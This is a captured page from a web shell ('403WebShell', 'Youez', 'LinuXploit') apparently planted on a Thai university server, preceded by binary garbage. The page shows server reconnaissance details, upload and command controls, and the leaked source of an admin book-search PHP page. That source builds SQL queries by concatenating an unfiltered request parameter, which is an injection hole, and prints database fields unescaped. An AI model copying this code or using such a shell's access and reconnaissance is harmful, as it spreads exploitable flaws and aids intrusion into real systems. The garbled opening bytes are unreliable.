h(  ) ($6;EbBLkfu�_l� ''8;DUFKV3Dd#,?ANk&5G$/(5M\^�ms����Sb�,;R''6c2I�!\����kx�Ve�[i��Me�IYO7:nOL~�Kr�qrv�I:�BM�y��s}r��K����x)1�6@r*2�89ma��&��'ti������{~#������t)1�2<�0:^5�W.uFzQ/u}�v��vv�u��U37yDJeEJo(/�5Ds'1�:Jlu�iy�iy�hw�1;:S`^BMLOQQn,4�7C�8C�>Lfe�]k�[i�Zg��IW�LZ�EP;,.��Tc�q(0) G,/]/1����w�r��l&-t*3�<<�u��#����j&.u��J68\8?"#$%&'()*+,-./0 ! 
Notice: Undefined index: dl in /var/www/html/web/simple.mini.php on line 1
403WebShell
403Webshell
Server IP : 10.254.12.21  /  Your IP : 10.254.12.21
Web Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
System : Linux arit.skru.ac.th 3.10.0-1160.76.1.el7.x86_64 #1 SMP Wed Aug 10 16:21:17 UTC 2022 x86_64
User : apache ( 48)
PHP Version : 5.6.40
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /proc/5800/root/var/www/html/sb2/pages/admin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /proc/5800/root/var/www/html/sb2/pages/admin/searchbook_edit.php
<?php include 'check_mode_admin.php';?>
<?php include '../dbconnect.php';?>
<?php include 'header.php';?>

<style type="text/css">
<!--
.style2 {color: #3366FF}
-->
</style>

<?php
function MonthThai($strMonth)
{
	$strMonthName = Array("","มกราคม","กุมภาพันธ์","มีนาคม","เมษายน","พฤษภาคม","มิถุนายน","กรกฎาคม","สิงหาคม","กันยายน","ตุลาคม","พฤศจิกายน","ธันวาคม");
	$strMonthThai=$strMonthName[$strMonth];
	return $strMonthThai;
}

$pagetitle_text = "แก้ไขข้อมูลบริการค้นหาตัวเล่มหนังสือ";
$num_books = 10;
$request_number = (isset($_GET["request_number"])) ? $_GET["request_number"] : '';
$sql = "SELECT request_list.*, faculty.faculty_name, user_type.user_type_name, receive_method.receive_method_name FROM ((request_list INNER JOIN faculty ON request_list.faculty_id=faculty.faculty_id) INNER JOIN user_type ON request_list.user_type_code=user_type.user_type_code) INNER JOIN receive_method ON request_list.receive_method_id=receive_method.receive_method_id WHERE request_list.request_number=" . $request_number;
$query = mysqli_query($conn,$sql);
if($result=mysqli_fetch_array($query,MYSQLI_ASSOC)) {
?>
		  
	<h1 class="page-header"><?php echo $pagetitle_text;?></h1>
	<form action="searchbook_edit_db.php" method="post" name="form1" id="form1">
		<table class="table table-striped table-bordered table-hover">
			<tbody>
				<tr>
					<td width="30%">ID</td>
					<td>
						<?php echo $result["request_number"];?>
					</td>
				</tr>	
				<tr>
					<td width="30%">วันที่ขอใช้บริการ</td>
					<td>
<?php
					//วันที่ เดือน พ.ศ.	
					$timestamp = strtotime($result["request_date"]);
					$dd = date('j', $timestamp);
					$mm = date('n', $timestamp);
					$yy = date('Y', $timestamp)+543;
					$date_thai = $dd . "  " . MonthThai($mm) . "  " . $yy;	
?>					
						<?php echo $date_thai;?>
					</td>
				</tr>						
				<tr>
					<td width="30%">คำนำหน้าชื่อ</td>
					<td>
<?php
	$sql2 = "SELECT prefix_name FROM prefix WHERE prefix_id=" . $result["prefix_id"];
	$query2 = mysqli_query($conn,$sql2);
	if($result2=mysqli_fetch_array($query2,MYSQLI_ASSOC)) {
		$prefix_name = $result2["prefix_name"];
	} else {
		$prefix_name = "";
	}
?>						
						<?php echo $prefix_name;?>			
					</td>
				</tr>
				<tr>
					<td width="30%">ชื่อ</td>
					<td>
						<?php echo $result["firstname"];?>
					</td>
				</tr>
				<tr>
					<td width="30%">นามสกุล</td>
					<td>
						<?php echo $result["lastname"];?>
					</td>
				</tr>
				<tr>
					<td width="30%">ประเภทสมาชิก</td>
					<td>
						<?php echo $result["user_type_name"];?>					
					</td>
				</tr>				
				<tr>
					<td width="30%">สังกัดคณะ/หน่วยงาน</td>
					<td>
						<?php echo $result["faculty_name"];?>				
					</td>
				</tr>	
				<tr>
					<td width="30%">โปรแกรมวิชา</td>
					<td>
						<?php echo $result["program"];?>
					</td>
				</tr>	
				<tr>
					<td width="30%">หมายเลขโทรศัพท์</td>
					<td>
						<?php echo $result["phone"];?>
					</td>
				</tr>	
				<tr>
					<td width="30%">อีเมล</td>
					<td>
						<?php echo $result["email"];?>
					</td>
				</tr>	
				<tr>
					<td width="30%">วิธีการรับหนังสือ</td>
					<td>
						<?php echo $result["receive_method_name"];?>
					</td>
				</tr>
				<tr>
					<td width="30%">สถานะ</td>
					<td>
						<div class="form-group">
							<select class="form-control" name="status_id" id="status_id">
<?php
	$sql2 = "SELECT * FROM status ORDER BY status_id ASC";
	$query2 = mysqli_query($conn,$sql2);	
	while($result2=mysqli_fetch_array($query2,MYSQLI_ASSOC))
	{
		if($result2["status_id"] == $result["status_id"]) {
?>							
								<option value="<?php echo $result2["status_id"];?>" selected="selected"><?php echo $result2["status_name"];?></option>
<?php		
		} else { //if($result["faculty_id"] == $resultx["faculty_id"]) {
?>							
								<option value="<?php echo $result2["status_id"];?>"><?php echo $result2["status_name"];?></option>
<?php		
		} //if($result["faculty_id"] == $resultx["faculty_id"]) {
	} //while($result=mysqli_fetch_array($query,MYSQLI_ASSOC))
?>
								</select>
						</div>					
					</td>
				</tr>									
				<tr>
					<td width="30%">หมายเหตุ</td>
					<td>
                                        <div class="form-group">
                                            <textarea class="form-control" rows="3" name="note" id="note"><?php echo $result["note"];?></textarea>
                                        </div>
					</td>
				</tr>
			</tbody>
	  </table>
	  
	  <h3>รายการหนังสือที่ต้องการให้ค้นหาตัวเล่มหนังสือ</h3>
                                <table class="table table-striped table-bordered table-hover">
                                    <thead>
                                        <tr bgcolor="#003399">
										<th><div align="center"><font color="#FFFFFF">ลำดับที่</font></div></th>
										<th><div align="center"><font color="#FFFFFF">ชื่อเรื่อง</font></div></th>
										<th><div align="center"><font color="#FFFFFF">ชื่อผู้แต่ง</font></div></th>
										<th><div align="center"><font color="#FFFFFF">เลขเรียกหนังสือ</font></div></th>																				
                                      </tr>
                                    </thead>
									<tbody>
<?php
	$i=1;
	$sql2 = "SELECT * FROM request_item WHERE request_number=" . $request_number . " ORDER BY item_number ASC";
	$query2 = mysqli_query($conn,$sql2);	
	while($result2=mysqli_fetch_array($query2,MYSQLI_ASSOC)) {
?>	
										<tr>
											<td>
												<?php echo $i;?>
											</td>
											<td>
												<?php echo $result2["title"];?>
											</td>
											<td>
												<?php echo $result2["author"];?>										
											</td>
											<td>
												<?php echo $result2["callnumber"];?>										
											</td>
										</tr>
<?php		
		$i += 1;	
	} //while($result2=mysqli_fetch_array($query2,MYSQLI_ASSOC)) {
?>									
									</tbody>
									</table>

<!--<b>หมายเหตุ</b><br />
1. ผู้ใช้บริการสืบค้นหนังสือได้จากระบบ <a href="http://202.29.16.43/opac" target="_blank">OPAC</a> (สืบค้นหนังสือคลิกที่นี่)<br />
2. เจ้าหน้าที่จะดำเนินการค้นหาตัวเล่มหนังสือ และจะแจ้งให้ท่านทราบ ภายใน 24 ชั่วโมง ตามช่องทางที่ท่านแจ้งไว้<br />
3. ในกรณีที่นำส่งที่คณะ/หน่วยงาน<br />
   &nbsp;&nbsp;&nbsp;3.1 หนังสือที่นำส่งจะต้องยืมผ่านระบบยืมทรัพยากรสารสนเทศเรียบร้อยแล้ว<br />
   &nbsp;&nbsp;&nbsp;3.2 ท่านจะต้องเซ็นรับหนังสือด้วยตนเอง<br /><br />-->
                                        <div class="form-group">
											<input type="hidden" name="request_number" id="request_number" value="<?php echo $request_number;?>" />
											<input name="submit" type="submit" id="submit" value="บันทึกข้อมูล" class="btn btn-success">
											&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
											<a href='javascript:history.back(1);'><button type="button" class="btn btn-default">ยกเลิก</button></a>										
                                        </div>	
	</form>	
<br /><br />
<?php
} else { //if($result=mysqli_fetch_array($query,MYSQLI_ASSOC)) {
?>	
	<BR />ไม่พบข้อมูล
	<BR /><BR /><a href='javascript:history.back(1);'><button type="button" class="btn-warning">คลิกที่นี่เพื่อกลับไปหน้าที่แล้ว</button></a>
<?php	
} //if($result=mysqli_fetch_array($query,MYSQLI_ASSOC)) {
?>

<?php include 'footer.php';?>

Youez - 2016 - github.com/yon3zu
LinuXploit